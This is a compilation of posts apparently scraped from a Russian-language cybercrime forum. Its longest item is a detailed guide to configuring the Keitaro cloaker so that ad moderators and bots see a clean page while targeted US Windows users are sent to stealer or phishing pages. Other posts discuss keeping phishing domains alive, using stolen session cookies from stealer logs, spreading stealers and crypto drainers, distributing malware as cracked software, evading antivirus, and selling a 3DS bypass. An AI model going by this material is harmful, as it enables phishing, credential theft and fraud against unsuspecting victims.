I bought several logs, always from the same day base, i use gologin, the cookies added to the browser, ip residental from the same area, and still no cookies works. I check google, and like a fresh browser, dont loged in automatically. What did i wrong? The logs are trash or i do something in a wrong way? I bought in the past logs from other side and when i added the cookies to the browser and set up the ip i always was automatically logged in in the gmail etc....
Лью траф на фиш. В первый день было много трафа, домен продержался сутки. И
потом менял в среднем 2 домена в день. Сейчас не держится и часа, как только
идет траф - сразу вешают табличку (((
Нашел человечков, кто поставит клоаку, поставили hide.click, окей. Живет
максимум день и банится /login страница, но сам /index сайта жив. Я такого
вообще никогда не видел.
Вот думаю или с клоакой проблемы или как-то траф лью не очень ок (лью не с
адса и там реально пишут дурачки хостеру и мне на почту домена гневные письма
за фишинг, некоторые даже анализы какие-то проводят, видео делают). Сам код
фишинга грязный грязнющий, смотрю по этой статье <https://telegra.ph/Getting-
rid-of-Google-Safebrowsing-red-screen-once-and-forever-Step-by-step-02-18>
Я лью на domain.com/id#1993 например ну так надо по моей схеме, возможно это
как-то палит гугл (id#1993 у всех одинаковый). У нас в конфе сидят люди, льют
спокойно на домен без /id#1993 ну без заебов и спокойно не парятся все живет
неделю (но льют не таким способом как я).
Может гугл банить по айпи сервака? Или может быть домены этого регистратора на
каком-то доп контроле, я уже не знаю.
До этого улетело в бан 12 доменов сразу за минуту, еще даже фишинг не успел
поставить ((( домены были вида d0main domaln doomain и тд, ну логично, только
чел у нас есть, кто льет на такие домены по несколько дней и объемы не сильно
меньше чем у меня ((
!!! DISCLAIMER !!!
Данный мануал написан не мной, а был найдет на просторах интернета. Я лишь
оформил его для удобного ознакомления.
Всё ниже описаное являет собой лишь ознакомительный контен для размышлений на
тему и как грунт для дальнейшего развития темы Вашими силами.
Данная статья не призывает к каким либо действиям.
Если Вы являетесь оригинальным автором данной статьи, пожалуйста, свяжитесь со
мной и я укажу Ваше авторство.
You must have at least 50 message(s) to view the content.
I am new to this domain so I need some help....
what is the best method to spam with stealer? Using Sendgrid, Mailjet, etc or corps emails with AMS?
Also sending with attachment or external link?
Сегодня поговорим о том, что такое «Общие бюджеты » в Google Ads и как с помощью их быстро разгонять бюджет вашей кампании.
Данная методика полезна, когда вам необходимо быстро разогнать и открутить бюджет аккаунта без оптимизации кампании на дистанции.
К примеру: Вы запускаете кампанию с достаточно агрессивными заголовками, ключами, расширениями и понимаете, что при маленьком бюджете и в короткое время вы имеете большой шанс получить бан (Подозрительные платежи, Бизнес модели, Обход системы)
В данном случае, эта методика будет оправдана для получения трафика быстро и в большом объеме на ваш сайт.
Самый первый «Общий бюджет » будет такой же, как и тот который вы ставили при настройке кампании. Нам нужно его просто подтвердить Далее уже добавляете новый «Общий бюджет » с повышением
Далее, уже добавляете новый «Общий бюджет » с повышением
Сама суть и основная фишка заключается в том, что добавлять новый общий бюджет нужно примерно на середине открученного дневного бюджета который вы выставляли изначально. Другими словами, пока идут показы и клики вам необходимо балансировать. Но тут есть один нюанс. Статистика в Google Ads подтягивается не сразу и очень легко можно упустить эту золотую середину. Поэтому для контроля кликов, мы используем трекер в котором всю статистику видно сразу.
Вот примерная лестница «Общих бюджетов » вам для примера. Но мы вам советуем экспериментировать, так как вариативность может быть большой, в зависимости от ваших нужд и бюджетов аккаунта.
Вот пример использования общих бюджетов
Данный материал служит только для ознакомления с некоторыми моментами работы в
Google Ads. Мы настоятельно рекомендуем работать честно и не злоупотреблять
слабостями этой замечательной площадки.
Всем добра! Удачных заливов и огромных профитов!
Следующая статья будет о том, как можно еще использовать Cloudflare на благо дел арбитражных.
[взял тут](https://telegra.ph/Obshchie-byudzhety-ili-Otzhimaem-akkaunty- Google-Ads-po-maksimumu-03-15)
Был опыт, но скорее был хайп проект, но никак не пирамида. Можете рассказть свой опыт, как в крупных пирамидах, которые вы открывали/учавствовали?. Как раскручивали?. Сколько выходило чистыми?. Не думайте, что я просто хочу вытянуть с вас информацию, а хочется узнать от лбдей, которые разбираются в этом
Описание темы:
1. Что внутри гайда?
Опыт последних лет. Материал подготовил из диалога со своим другом, отвечал на его вопросы и сам давал комментарии как и что лучше ему сделать. Нужно немного пояснить, он новичок и познания в трафике у него на нуле. Поэтому дополнительно ему разжевал уже лично и части информации возможно не хватает внутри гайда. Дополнил уже лично от себя с пояснениями и примерами. Вопрос можно задать мне в личку или по контактам в пособии (контакты можно найти внутри).
2. Какая выгода прочитать его?
Как минимум ты поймешь как делать установки самому и не сливать на паблик трафферов, которые продают биржевые установки в десятки рук.
3. Что получишь после прочтения?
После изучения материала, у тебя будет полное понимание как стабильно и ежедневно получать установки на файл. Установки делать можно хоть на exe и apk. Десктоп и мобилки. Варианты монетизации этих знаний: 1. Лить самому себе и снимать сливки (ба, сс, онлайн платежки, шопы, соц сети и т.д) 2. Оказывать услугу на сторону по фиксированной оплате за установку или за процент от снятых средств.
Краткое описание гайда:
- Как настроить рекламу для получения установок на файл (exe/apk)
- Двух шаговый подход в рекламе (позволяет лить на любой файл без банов в
рекламных сетях)
- Без клоаки (тебе не потребуется прятать лендинг от ботов)
- Файл не будет сливаться на VT (вирус тотал)
- Они сами будут хотеть скачать и установить твой файл и тем самым смогут
отключать антивирус
Скачать или читать онлайн : "Полная система для привлечения 200.000 лидов в месяц и создания потока установок на твой файл" от действующего траффера"
Spoiler: Ссылка для скачивания
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/g4Z32RwC#lf7TWdKInwQyzGtPk0B3Ln8aPUvp6G8SO5xA_XiNBJ4)
mega.nz
Важное пояснение: Лиды - это люди переходящие по рекламе и совершающие нужное тебе действие. Лид не равняется логу. Предполагаю вопросы и комментарии на эту тему, поэтому отвечаю. Прочитав гайд, станет понятно.
Немного цифр: стоимость 1 клика может стоит 0.003$ так и 0.131$. Все зависит от ГЕО. В гайде советую начинать с ГЕО с самой низкой стоимостью. Тем самым 1000 кликов Индии будет стоить жалкие 3$. 200тыс кликов * на 3$ = 600$ в рекламном бюджете. Эти 200тыс кликов по итогу превратятся в 10-20тыс лидов (Все зависит от лендинга и рекламного оффера). Во общем усложнять не буду, лучше задай вопрос и я дополню информацию.
P.S Мне было жаль терять этот материал и просто удалить его, весь диалог длился более двух недель и я вложил немало времени на помощь другу в объяснение того, чем я занимаюсь и на чем зарабатываю. Решил что потрачу еще время, оформлю как подобает в pdf и выложу на форум и пусть эта информация будет для тебя полезной. Будут вопросы, пиши по контактам внутри гайда.
Собственно все в сабже.. буду признателен , если поделитесь линком на рабочую (более менее свежую) версию AMS Enterprise. Спасибо.
В нескольких ветках поднимался вопрос о том как с помощью клоаки распределить
трафик на целевой и нецелевой, или как пропустить рекламу запрета через
Google, Facebook и т.д. как оказалось, это проблема и в личку поступали
вопросы, поэтому решил открыть ветку по настройке, ибо она простая как
тамагочи, особбенно если вам нужна только функция кло, без треккинга, подсчета
бюджетов, маркеров и пикселей (хотя все это тоже есть в Keitaro). Почему
именно Keitaro? Есть же много других кло? не знаю, мне она зашла как простой и
очень эффективный продукт, который по моему мнению больше всех соответствует
параметру цена/качество, ведь цены на кло что я видел - от 20-1000$, и за
частую не обусловлены ничем, кроме коммерческого пиара в виде секретного
секрета, по секрету ссекреченому на Ютубе/телеге/РенТВ и прочих секретных
ресурсах только для своих)) есть несколько продуктов, которые ниже чем
Keitaro, и которые я лично хочу потестить когда дойдут руки. Более того, она
имеет триалку в 14 дней, что дает возможность работать с ней вообще бесплатно
(ни слова об этом, ато прикроют лавочку, только по секрету). лицензий же у них
3 - 49/89/129 евро. советую брать среднюю, если вас не команда, или один в
команде клоачит, т.к. там можно добавлять 100 доменов, что по сути отобьется
вам только на ССЛ сертификатах, поскольку клоака их присваивает каждому домену
свои и бесплатно)). Это была не реклама, но могла бы быть, Keitaro свяжитесь
со мной)) В общем программа мне нравится, и справляется на отлично с задачами
(еще не было ни одного блока доменов, серверов, и прочего, по проливу на
инсталы). Теперь по сути, Английскую версию не буду переводить, еще не
настроил GPT4, на которого получил сегодня ключи (быстрее чем Сбер если не
ошибаюсь))), вместо перевода сделаю скрины с выделением нужных настроек.
Поехали;
Я не буду останавливаться на установке Keitaro на сервак, поскольку дело то
еще муторное, какого-то перепуга Keitaro ставится только на Centos8 или 9
Stream, которые уже пару лет не обслуживаются, и серваков с предустановленной
этой ОС найти не легко, а установить самому у меня не получилось, т.е.
получилось то без проблем на ubuntu18.04, обновив с centos7? которая почти на
каждом сервере есть, но Keitaro никак не хотела устанавливаться на обновленную
до 9. и требовала ориг полную Centos9, и никакие пробы удаления или
переустановки модулей которые били ошибку не помогло. Поэтому самый идеальный
вариант - хостинг с предустановленной Keitaro. У них на сайте при покупке
указаны несколько серверов, купив которые вы получите уже с Keitaro, вам
только остается войти и внести лицензию (ну или войти и через 14 дней
выйти))). Поэтому, сервер берите такой, немного дороже, но время еще дороже, а
с триалкой на 2 недели - так и дешевле то)). Поэтому, поехали по настройкам:
Я пользовался двумя способами клоаки, оба эффективны и один подходит всем
почти направлениям, а второй больше ориентирован на фиш через серверные
оболочки для фиша, типа next gen и прочих. хотя в целом очень похожи. Для
первого способа нам понадобятся: 2 зип архива с полными исходниками сайтов или
лендингов. Двух разных сайтов. Из них - 1(black)- это ваш сайт на который
хотите лить и на котором куча каки и бяки, которые не в жизнь не пропустит ФБ
и Гугл (на английском, или любом другом кроме Ру, по Ру же мы не работаем))) и
2(white) - это сайт с ликами святых угодников, к которому при всем желании
модерации не к чему доеб... пристать. Тематика желательно по рекламной теме,
но с учетом требований ФБ и Гугла, даже еще лучше), т.е. мониторите требования
рекламной площадки и делаете под эти требования сайт (из основного
обязательного - если вам нужна тематика которая совсем запрещена, делаете
похожую разрешенную, например ФБ почти не пропускает рекламу криптовалют и
само обнаружение слова крипто(crypto) и т.д. может завернуть рекламу даже при
идеальных крео. Поэтому вайт делаете без этих слов - любая тематика финансовой
грамотности, управления активами, расходами и прочее - в общем обо всех разных
финансах не отделяя отдельно крипту, в таком же плане любая тематика. Вайт
ОБЯЗАТЕЛЬНО должен содержать живые ссылки Terms и Privacy, и все ссылки должны
быть живыми и переводить туда куда указывают без всяких редиректов, штук 5
более чем достаточно, в принципе ссылки внутри самого лендоса (якоря) вполне
прокатывают. Зип архив должен быть до 2 ГБ (более чем для сайтов, а уж
лендосов так вагон) и обязательно чтоб файл index.html или index.php должен
быть по первому открытию архива. Зип обычно архивирует через одно открытие,
если просто нажать на папку правую кнопку -->архивировать, поэтому заходим в
папку, если там еще оин путь папки и нет файлов - открываем ее и так пока не
откроете папку с файлами и индекс файлом, выделяете все файлы и папки, правую
кнопку --> архивировать - и вы получите нужный архив, открыв который вы
увидете свою индекс страницу, а не просто еще одну папку. Это основные
требования для всех, больше требований уже учитываете исходя из правил
конкретно через кого льете. У Гугла могут быть свои нюансы, у ФБ свои - но это
уже больше к теме пролива и арбитража, если все на столько подробно описывать
откроется окно добавления домена, в котором мы в строку Domain вписываем ваш домен (если это внутренняя страница сайта то прописываем путь, в общем сюда ставим адрес страницы которую нужно клоачить скрывая офер от ботов и нецелевого трафика, ниже нажимаем Create и с придумываем название всей кампании, запоминаем, это название будем вводить дальше еще 3 раза в таком же самом окошке других настроек, далее оставляем галочки по умолчанию и нажимаем Add.
Вас переведет назад в меню доменов, где появился ваш новый домен, но в Status указано Awaiting DNS. Копируете снова IP (Прошлый раз в общем можно было не копировать, лень переписывать))) и идете в настройки DNS своего домена, где удаляете все записи (в некоторых регистраторах Вам удалят все, в некоторых не дадут удалить ns1 и ns2 - и так и так пойдет, и создаете новую А запись, где вставляете свой IP . т.е. у вас получится примерно у всех регистраторов - Tipe
Дальше переходите во вкладку Landing Page ---> Сreate --> откроется окно
добавления лендинга. тут оно открывается на нужной вкладке Local, первым делом
придумываете название лендосу (любое), в Group прописываете название которое
писали в Домене и Оффере, так-же нажимаете Choose file и добавляете архив с
сайтом/лендингом с чистым контентом и с чистой совестью нажимаете Save (ничего
больше не изменяя на странице) (если при загрузке архива выбило ошибку - все
как в прошлой вкладке и так-же исправлять.).
Идем в следующую вкладку - Campaigns. Тут самая интересная и самая основная
настройка. Сразу как обычно придумываем название Всей нашей кампании (не
чесной, а рекламной)), ниже выбираем домен, который добавляли в вкладке
Domain. Если ваш домен там еще не появился - значит он еще не прописался в
настройках домена, можете перейти проверить все ли правильно ввели в А запись,
обычно к этому времени уже должен появиться выбор домена, в статусе домена
должно быть ОК, или ваш регистратор просто медленный, а вы вряд-ли могли
ошибиться - вы красавчики (т с такой инструкцией - в 5 лет уже можно
настраивать, как можно ошибиться?))) ниже вводим название Group как и в 3
предыдущих таких строках. и тут мы подошли только к тому, для чего все тут
собрались)) А что же было до этого, спросите Вы? а это было для тех, кому
нужно все рассказать с самого момента как загрузился Виндовс)) чтоб потом все
эти вопросы не забивали личку, и не приведи Господи телегу, особенно в 3-4
часа ночи (самое любимое время вопросов с форума))). Если уж и это Вам не
понятно - мне писать бесполезно, просто смиритесь и примите данность что это
не ваше, лучше найдите себя где-то на престижной работе в такси, например)) Ну
или готовьтесь платить тому, кто все понял по картинкам и настроит за 5-7
минут но за 50-70$))
В общем все преднастройки готовы - можете для надежности сохранить нажав
Create (мало ли свет отключат, многие с таким в это время сталкиваются, Вам
МИРА!((()
Нажимаем Create Flow - это сама настройка условий для перенаправлений. Мы
настроим все 3 условия, значит заходить в нее будем тоже трижды. Открывается
окно настройки.
Сразу переставляем галочку Flow type на Forced, в окне Flow names пишем Bots
(для удобства, можете любое другое вам понятное) и переходим на вкладку Shema.
Тут галочку не трогаем (трогаем Людочку)) (блин, с переводом будут наверно
траблы))) кто переводит с русского переводчиком - все что в кавычках() - не
читайте, это вас запутает только).. оставляем на Landing Pags&Offers в строке
Landing Pages выбираем наш лендинг (это который чистый white) и нажимаем
вкладку Filtres. Тут мы, т.е. вы, не трогаете галочку, остается на and (хотя
тут особо пох, тут одно условие всего), выбираем Add Filter и в всплывающем
окне выбираем Bot. У вас появится ниже условие Bot с переключателем по
умолчанию на IS., так и оставляем, и нажимаем Apply. 1 условие мы прописали. У
нас получилось - мы настроили Keitaro так - Forced (принудительно,
безоговорочно, в первую очередь) on Landing Page (на чистую страницу) forward
(направить) all IS BOT (всех ботов). Это условие будет при переходе по ссылке
в рекламе проверяться и исполняться первым.
Далее нажимаем на Create float снова (можете сохранить предварительно нажав Create чтоб не слетели уже настроенные функции). Снова попадаем на Main вкладку и настраиваем новое условие. Галочку Flow type оставляем на Regular, Flow name прописываем users (или как вам удобнее) и переходим на вкладку Schema. Тут мы выбираем уже не лендинг, а Offers и в всплывающем окне выбираем наш Black (страницу с офером и кучей гадости, но главное бабок (но это не точно)), и переходим на вкладку Filtr... тут самое внимательное и основное. тут вы настраиваете те условия, которые определяют целевой трафик... т.е. во всплывающем окне добавляете условие и либо переставляете бегунок на IS/IS Not (является/не является) или прописуете те условия которые вам нужны. В качестве примера я покажу настройку на основной оффер инсталов - одну програмку которую вы найдете в разделе продажа стиллеров. Вы с трафером решили сегодня пролить ЮСА, поэтому тут мы будем выбирать - проверяете что галочка Logical relation стоит на AND... 1 можно выбрать Bot и переставить переключатель на IS NOT? тем самым продублировав первую настройку и усилив, если вдруг с первой как-то произойдет тупняк и она пропустит бота, то тут подсирахует и не пропустит, отправив дальше, а дальше снова будет чистая. 2. ставите Country - IS пишете Unated States (или выбираете). 3. усилим прошлый пункт и отсечем дополнительно РУ регионы (мы же не работаем по РУ))) ну и отсечем РУ зевак, которые любят парсить рекламные кампании с целью подсмотреть, тем более все тут продающиеся продукты так или иначе не сработают на них. Снова выбираем Country , только теперь ползунок переставим на IS NOT и пропишем Ukraine, Belorus, Russia. 4. выберем Language, переставим на IS NOT и опять выбираем РУ, только по раскладке клавиатуры Ukrainian, Belorusian, Russian. Все, по РУ не работаем наверняка. дальше - 5. установим тип устройства (если это стил, то он только на комп, так и выберем - Device Type - IS - Desktop computer (если нужно еще другое устройство - добавляете, если вам подходят все устройства, а какое-то одно-два не подходят - проще выбрать IS NOT - и исключить те что не подходят, но дублировать не нужно, если вы поставили IS "любое", то не нужно еще раз выбирать устройство и ставить IS NOT "все кроме любого", это лишнее, так мы сделали только с Ботами (это в рамках двух разных настроек и важное усиление и с Country частично, но там нет разделения всех стран, а только одну пропускать, 3 не пропускать, остальные страны не трогали. Если вам все подходит кроме РУ (естественно) - то выбор IS - Unated States не ставите, а только исключаете РУ) 6. на стил нам подходит только Винда - так и ставим - OS
И последняя настройка - снова жмем Create flow, только теперь галочку ставим
на Default (все остальные), у вас уменьшатся строки, переходите на вкладку
Sсhema и в Landing pages вібираем наш лендос. Нажимаем Apply, и сохраняем все
нажав Create/
Еще один важный момент, вроде-бы все настроили, и можно бежать лить, но не
торопимся и переходим снова на вкладку Domains, нажимаем на наш домен, и в
строке Index Page выбираем наше название Group, которое мы вводили 4 раза на
всех вкладках - Save и проверяете чтоб домен имел значение в каждом столбце.
Второй вариант настроек через редирект. если у вас по каким-то причинам нет
скрипта оффера или не удобно переносить какой-то шоп не новый или оффер у вас
фиш на специальной серверной оболочке. Тогда во вкладке оффер вы не загружаете
архив, а в вкладке Redirect в строке Redirect type оставляете HTTP redirect, а
ниже прописуете URL страницы с оффером, все остальные настройки такие-же как в
1 варианте. Только в первом варианте у нас задействован 1 домен и в его рамках
распределяется трафик, а во втором - боты и нецелевые пользователи остаются на
том который переходили по рекламе, а целевые переведутся на другой домен с
офером. Первый вариант больше оптимален, менее затратен, но иногда подходит
только 2-й...
В целом это все, принцип работы клоаки тут изложен прям ну очень подробно и
применим на любой клоаке в принципе, только может отличаются названия какие да
цвета. На форумах есть слитые крякнутые версии клоак, я сразу скажу, что не
пробовал и пробовать не хочу, клоака на то и нужна, что ее обновления
постоянно оптимизируют распределение трафика, целая команда сидит ломает
голову как улучшить эти показатели, а на кряке вы получите в лучшем случае
сигнатуры 2-4 летней давности, будете терять целевой и приводить к офферу
нецелевой траф и ботов, будут улетать акки рекламы, сервера, домены, или вам
нужно сидеть кучу времени искать по крупицам сигнатуры, ip и прочие
идентификаторы ботов и постоянно ручками все обновлять... 90 евро сэкономив???
так я вам показал как по 2 недели бесплатно юзать, прокси поменял, почту
поменял, папки переименовал (вы палите очень сильно загружая архив, выбирая
файл - путь к папке один и тот-же - а когда папка довольно глубоко - то очень
уникальный типа ---> Мой компик -->Диск F (вирусы) ---> Пользователи---> Хакер
Валера Кукушкин ---> Рабочий стол ---> вирусы всем --->вирусы не по ру(не
работаем по ру) ---> сливы ---> стилеры с форумов ---> c лучшего на свете xss
---> от OnixOmegaBumster ---> PinkLine ... ну вы поняли о чем я... не
удивляйтесь если 2-я триалка вам заблочит и 3-ю и 4-ю))) в целом ни про кого
лично не писал, думаю тут всем достаточно по картинкам пробежать и может даже
поправить в каких-то моментах, но уточню что я не расписываю тут трекинг,
обработку трафика, проверку математики и прочие полезности, на которые не
хватит веток все расписать. Это чисто функция сортировщика ботов, для того
чтоб через придирчивых рекламщиков прогнать запрет. Но каким-то паре
школьников случайно заскочившим пригодится все до буквы что написано, и они
еще узнают в добавок что по ру нельзя работать))) Уточню, что ни в коем случае
не претендую на уникальность, тут никакого супер секретного метода нет,
никаких сверхспособностей не нужно иметь, я лишь изложил то как я настраиваю,
при хорощих крео бывает 10 из 10 акков начинают откручивать, домены есть
которым по 3 месяца, на них не лили круглосуточно, но периодически нагружали -
все живые, ни одного не блочили, хотя явно фишинговые (тбфу-тьфу) трафик
сортирует эта настройка под мои запросы идеально, вы найдете свои... Все. На
этом закругляюсь, всем МИРА, это сейчас главное, а бабло и так заработаете.
Приветствую уважаемых знатоков!
Вопрос очень простой, но важный для любого спамера. Куда вы ведете трафик?
Может есть советы по партнеркам или способам монетизации?
Работаем небольшой командой, трафик есть. В основном USA, есть с бигов и с
корпов возможно.
Буду рад любым предложениям/советам. Первый контакт через ПМ форума.
Всем хорошего дня и профитов
Приветствую, давно не лил, пролил за прошлые 2 дня около 40 видосов, предварительно уникализировал, ссылка битли в описании, лил кряки. В общем из 40 видосов остался один. Удаляют в течении от одного до трех часов. Если даже ты меняешь название, убираешь из описания такие слова как crack free download все равно убивает. Единственное что я не могу, так это в тегах убрать слова триггеры, потому что мамонт тогда просто напросто не найдет мои видосы. Есть ли способы обхода данной проблемы? Или просто нужно уже забыть про ютуб?
всем хай
какие есть источники инсталлов помимо google ads, fb ads, bing, yt и бирж?
заметил тенденцию, что как ютуб гайки закрутил, то логов на рынке гораздо
меньше стало)
Продам метод обхода 3 дс за символичесткую сумму (300$)
Гарант +
Гарант форума+
Не мерч
Не паблик инфа
Автор:sabahulnoor
Источник: https://xss.is
Привет! Продолжаем зарабатывать на чужих сокровенных желаниях в третьей части.
Сегодня у нас часть про OnlyFans/Patreon.
[PART 1] - [PART
2]
Мне хотелось изначально запостить данную тему в раздел 'Бизнес', тут я буду
расписывать подход к данным делам со стороны не только траффика, но и бизнеса.
Нужно будет потратить как время, так и средства, чтобы в последующем собирать
денежный урожай.
Что такое есть OnlyFans и Patreon?
Две самые популярные платформы для создания контента, изначально были
задуманны как платформы для любого платного контента, но со временем это всё
превратилось в продажу голых женщин.
Платформы эти в последние годы привлекли к себе всеобщее внимание. Рост этих
платформ создал новые возможности для создателей контента, чтобы
монетизировать свою работу и общаться со своей аудиторией. В этом разборе
предлагаю посмотреть обзор OnlyFans и Patreon , включая их бизнес-модели.
![](/proxy.php?image=https%3A%2F%2Fexternal-
content.duckduckgo.com%2Fiu%2F%3Fu%3Dhttps%253A%252F%252Flogos-
marcas.com%252Fwp-content%252Fuploads%252F2022%252F01%252FOnlyFans-
Logo.png%26f%3D1%26nofb%3D1%26ipt%3D899feee48f282c5637931dd63a97888ebde5aef3a6f505c15e36be714e3420af%26ipo%3Dimages&hash=053cc8abafe88b9104e214ae438b56b4)
OnlyFans — работает на основе подписки, которая позволяет авторам делиться
своим контентом с подписчиками за определенную плату. Платформа в первую
очередь известна контентом для взрослых. OnlyFans завоевал популярность среди
эро-индустрии, и взрослых артистов, которые используют платформу для
монетизации своей работы и общения со своими поклонниками.
Выстрел из всех медиапушек случился во время пандемии 20-го года, так как многие люди обратились к OnlyFans как к источнику сочного дохода во время блокировки и ограничений.
Бизнес модель:
Создатели могут устанавливать цены на подписку, а фанаты платят ежемесячную
плату за доступ к своему контенту. OnlyFans берет 20% комиссию за подписку,
что означает - 80% ваши. Помимо платы за подписку, также можно получать доход
за платные сообщения/диалоги.
Так же контентмейкеры могут создать сбор чаевых, в таком случае границ сумм
для чаевых нет.
И ещё вы можете предлагать своим подписчикам собственный контент по желанию.
Это могут быть персонализированные фотографии, видео и сообщения, потолка цен
так же нет, если раздевать аудиторию, то по полной.
Платные сообщения:
Поклонники могут отправить сообщение создателю за плату, которая может быть установлена создателем, однако каких-то границ цен в данном случае - не существует. Особо удалым можно продать итоговый 1 час диалога за общую сумму в 100к$.
Стоимость подписки:
OnlyFans позволяет создателям устанавливать плату за подписку, которая может варьироваться от 5 до 50 долларов и более в месяц. Когда юзер подписывается на профиль создателя, с него автоматически взимается ежемесячная плата за подписку, пока он не отменит свою подписку.
Выплаты с онлифанса:
Еженедельно, минимальный порог выплаты - 20$. Можно получать выплаты с помощью банковского перевода или электронных кошельков, PayPal и Payoneer. OnlyFans взимает комиссию 5% за выплаты, через банковским переводом, и 2% сделанные через электронные кошельки.
Ограничения:
В OnlyFans нельзя делать контент если актриса не старше 18 лет.
Паспорт или водительские права, обязательные. Причём с новым обновлением, как
я понимаю раньше такого не было, даже обычные юзеры должны будут подтверждать
их совершеннолетие.
![](/proxy.php?image=https%3A%2F%2Fexternal-
content.duckduckgo.com%2Fiu%2F%3Fu%3Dhttps%253A%252F%252F1000marcas.net%252Fwp-
content%252Fuploads%252F2021%252F07%252FPatreon-
logo-2013.png%26f%3D1%26nofb%3D1%26ipt%3D0f77dc3170f44c3919fe39301625d499f5969cd8e5be93baca1bdca36bbd6cff%26ipo%3Dimages&hash=e4793710ce7819dc941a9225bcdc0983)
Patreon - то же самое дерьмо с, но другими названиями, платформа на основе
подписки. Разберём только реальные отличия от площадки выше.
Membership levels:
Гугл переводчик сказал что это уровни членства, но лучше буду называть
подписка. Каждая имеет под собой преимущества и награды. Вы можете ставить
свои собственные подписки, тут нет потолков цен как в OnlyFans, можно ставить
99999$ в день.
Patreon берет комиссию в размере 5-12% от дохода, всё остальное - ваше.
Выплаты:
Ежемесячно, с порогом выплаты 1$. Есть получение выплат через PayPal или прямой депозит. Комиссия за платёж в размере 2,9% + 0,30$ транзакцию для выплат, сделанных через PayPal, 0,8% для выплат, сделанных через прямой депозит.
С стандартными бизнес моделями покончено, можно переходить к дополнительным, но от этого не менее прибыльным способам монетизироваться:
Tips - чаевые, как и говорил выше.
P2V - лучший способ ахринительного заработка, о котором говорили в [PART 2]
Мёрч - футболки, плакаты и другие фирменные товары. Если запаритесь, миллионерами вам быть с вероятностью 100%
Партнерки/Партнерский маркетинг - работает в 2 стороны:
1. Приглашай в мой патреон друзей и получай 50% с их платы за контент. (Думаю
все знают как это делается)
2. Заходите в данную игру/казино/сайт/приложение/т.д. по моей реф ссылке. (И
это тоже)
Спонсорки - самый хардкор. Если вы набрали достаточно аудитории,
договоритесь с малоизвестным брендом о постоянном спонсорстве.
Чтобы вам стало понятнее, вспомните сколько женщин вы видели на PornHub'е в
мерче PornHub'a? Футболки с надписями, открытые веб страницы на где-то на фоне
видео, etc.
Ответ - дохера. По вашему они просто так в этих футболках снимаются?
Всё это относится к спонсоркам.
Выбрали ту платформу которая нравится больше? Заеbones.
Теперь переходим к тому как нам туда нагнать людей.
Я приведу вам пример работы моего очень хорошего знакомого, он взял готовый
метод и просто по плану повторил его.
Расскажу по пунктам, что было сделано.
1. Самое сложное, далее ничего подобного не будет. ВАМ НУЖНО, представьте
себе, ГОВОРИТЬ С ЛЮДЬМИ!
Я понимаю возможный ужас в ваших глазах, но это нужно будет сделать, чтобы
найти актрису.
Раньше, когда моральный уровень общества был чуть выше, считалось чем-то
стыдным вертелявить голой жопой перед камерой. Теперь это престижно.
Наш диалог с любой женщиной будет таков:
Привет, как дела, блаблабла, в общем хочу свою студию Онлифанса сделать, весь
доход делим на 60% тебе и 40% мне (ну или как вам там угоднее будет), всё
оборудование уже приобрёл. Примерные заработки для нас в первый месяц -
копейки, в первые 3 месяца - около 15к$ (да это правда, платить то вам будут в
долларах).
Если набёрете больше чем 1 женщину в свою команду, будет ещё круче, вы просто сможете заниматься сразу двумя проектами которые будут сыпать вам озабоченными мастурбаторами.
2. Покупаем оборудование.
Blue Yeti / 3Dio - микрофон, обязательный пункт.
Камера - любая на выбор, любой совет из интернета будет совпаадать с моим.
Мой выбор - Sony Alpha ILCE-7SM3, Panasonic Lumix DC-GH5 Mark II, Fujifilm
X-S10.
Студия - купить/арендовать если вы побогаче, обычный кусок черной/белой ткани натянутый на любую опору сзади в качестве фона если вы победнее.
3. Переходим к созданию стартового контента.
Зачем? Все пользователи которые будут переходить в ваши сервисы должны
встретиться с интересными им вещами, монетизация нашей актрисы пойдёт
буквально с момента первых подписчиков.
Пару 'hot' фото, по желанию видео.
4. Создаём сеть социальных сетей(?what?)
Telegram - держим в голове что контент сконцентрирован на 1-й персоне.
Работаем только с односторонним подходом.
Instagram - нужно ли объяснять зачем он в работе с аудиторией?
Patreon/OnlyFans/Boosty - Чем больше сервисов подписки вы создадите, тем
больше аудитории захватите, подходите к этому с умом индивидуально. У меня
выбраны 2 самые известные на западе, и 1 в СНГ.
Youtube - а вы как думали, зачем нам микрофон и камера? Конечно записывать самый популярный контент который разлетается как горячие пирожки.
ASMR. Звуки на микрофон и камеру.
Самый взрывной контент который склоняет буквально всех к покупке - Ear
Licking. В таком формате актриса просто лижет/сжирает силиконовые уши
микрофона, самая мастурбируемая тема из моего опыта. Всегда демонетизируется
ютубом, но кому нужна монетизация когда можно залететь в тренды на 1кк
просмотров?
Ведь и в правду просто лижет силиконовые уши.
Spotify - для того чтобы выкладывать туда контент в звуковом формате, причём он не демонетизирует ничего, поэтому там вы сможете собирать не совсем огромные, но 300-500$ в месяц спокойно, если проверифицируете себя как контентмейкера спотифая.
График контента:
Советую придерживаться постоянного графика, дабы получить наибольшее
количество аудитории.
Приведу лично мой график которым я пользовался для Telegram Instagram Youtube.
YouTube - стандартное асмр видео, источники будут если вы напишете ASMR в
поиск.
Instagram - фото связанное с вашим сегодняшним асмр видео, хэштеги и ссылки на
ваши учетные записи в остальных местах.
Telegram - тоже что для инсты. Вероятно какой-нибудь кружочек от актрисы,
таким образом поднимается доверие аудитории к актрисе.
Каждая неделя - 2 видео.
Основы подписочных сервисов на этом полностью пройдены. Пользуйтесь и становитесь P.I.M.P.
Есть вопросы, спрашивайте в тг меня. Есть желание работать в эротике но не знаете как это всё начать, спрашивайте в тг меня.
Спасибо за просмотр!
Ставьте лайки, всем удачи и всем пока.
Всем привет!
Последнее время, ловлю себя на мысли, что куда лить есть всегда, а выбрать
одну нишу сложно, понимаю что для каждого все индивидуально, но вариантов
накидать можно)
Предлагаю в данной теме обсудить, какие оффера подойдут для стабильного
отлива, следовательно стабильного профита.
Речь про работу в долгую
По типу гемблы, нутры...
Please i need advice on how to spread drainers effectively
Please all advice are welcome
Есть человек, который продает строки логин/пароль/ссылка впн. Впн причем там
разные в основном какие то мелкие типо докторвеба и т.д
стало интересно как он добывает это? строк прям у него очень много..
Сразу же подумал о ProxyShell, но вроде как он уже не может столько давать, и
если это он то что за скрипт, https://github.com/dafthack/MailSniper - тут
что то похожее но не увидел чтобы он списки айпих серверов из текстовика
проверял и выдергивал кредсы из почты. Сорри за где-то нюбский вопрос, никогда
не работал с таким, гуру должны знать
has anyone actually had success working logs from a stealer?
